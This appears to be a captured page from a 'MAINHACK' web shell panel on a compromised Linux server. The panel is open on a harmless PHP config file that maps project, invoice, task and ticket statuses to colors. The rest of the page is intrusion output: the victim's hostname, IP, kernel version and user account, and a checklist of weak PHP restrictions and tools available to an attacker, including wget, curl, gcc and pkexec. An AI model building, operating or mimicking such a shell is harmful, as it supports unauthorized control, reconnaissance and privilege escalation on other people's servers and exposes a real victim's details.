[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: system.php
<?php /**----------------------------------------------------------------------------- * NEXTLOOP * DO NOT EDIT THIS FILE * [exmple blade] {{ config('system.settings_company_name') }} * [example controller] config('system.settings_company_name') *------------------------------------------------------------------------------*/ return [ /** * Various project statuses, with their corresponding bootstrap colors (colors are used for labels etc) * [IMPORTANT WARNING] * Only change the color values * [AVAILABLE VALUES] * default|info|warning|success|danger|primary|green|lime|brown */ 'project_statuses' => [ 'not_started' => 'default', 'in_progress' => 'info', 'on_hold' => 'warning', 'cancelled' => 'purple', 'completed' => 'success', ], /** * Various invoice statuses, with their corresponding bootstrap colors (colors are used for labels etc) * [IMPORTANT WARNING] * Only change the color values * [AVAILABLE VALUES] * default|info|warning|success|danger|primary|green|lime|brown */ 'invoice_statuses' => [ 'draft' => 'default', 'due' => 'warning', 'overdue' => 'danger', 'paid' => 'success', 'part_paid' => 'info', ], /** * Various estimate statuses, with their corresponding bootstrap colors (colors are used for labels etc) * [IMPORTANT WARNING] * Only change the color values * [AVAILABLE VALUES] * default|info|warning|success|danger|primary|green|lime|brown */ 'estimate_statuses' => [ 'draft' => 'default', 'sent' => 'info', 'accepted' => 'success', 'declined' => 'danger', 'expired' => 'warning', ], /** * Various task statuses, with their corresponding bootstrap colors (colors are used for labels etc) * [IMPORTANT WARNING] * Only change the color values * [AVAILABLE VALUES] * default|info|warning|success|danger|primary|green|lime|brown */ 'task_statuses' => [ 'new' => 'default', 'in_progress' => 'info', 'testing' => 'purple', 'awaiting_feedback' => 'warning', 'completed' => 'success', ], /** * Various task priority, with their corresponding bootstrap colors (colors are used for labels etc) * [IMPORTANT WARNING] * Only change the color values * [AVAILABLE VALUES] * default|info|warning|success|danger|primary|green|lime|brown */ 'task_priority' => [ 'normal' => 'info', 'high' => 'warning', 'urgent' => 'danger', ], /** * Various ticket statuses, with their corresponding bootstrap colors (colors are used for labels etc) * [IMPORTANT WARNING] * Only change the color values * [AVAILABLE VALUES] * default|info|warning|success|danger|primary|green|lime|brown */ 'ticket_statuses' => [ 'open' => 'info', 'on_hold' => 'warning', 'answered' => 'success', 'closed' => 'default', ], /** * Various ticket priority, with their corresponding bootstrap colors (colors are used for labels etc) * [IMPORTANT WARNING] * Only change the color values * [AVAILABLE VALUES] * default|info|warning|success|danger|primary|green|lime|brown */ 'ticket_priority' => [ 'normal' => 'info', 'high' => 'warning', 'urgent' => 'danger', ], /** * Show task timer seconds, when displaying the timers (excluding the timesheet page, which will always display seconds) * [AVAILABLE VALUES] * TRUE|FALSE */ 'timers' => [ 'display_seconds' => TRUE, ], ];
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.02 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002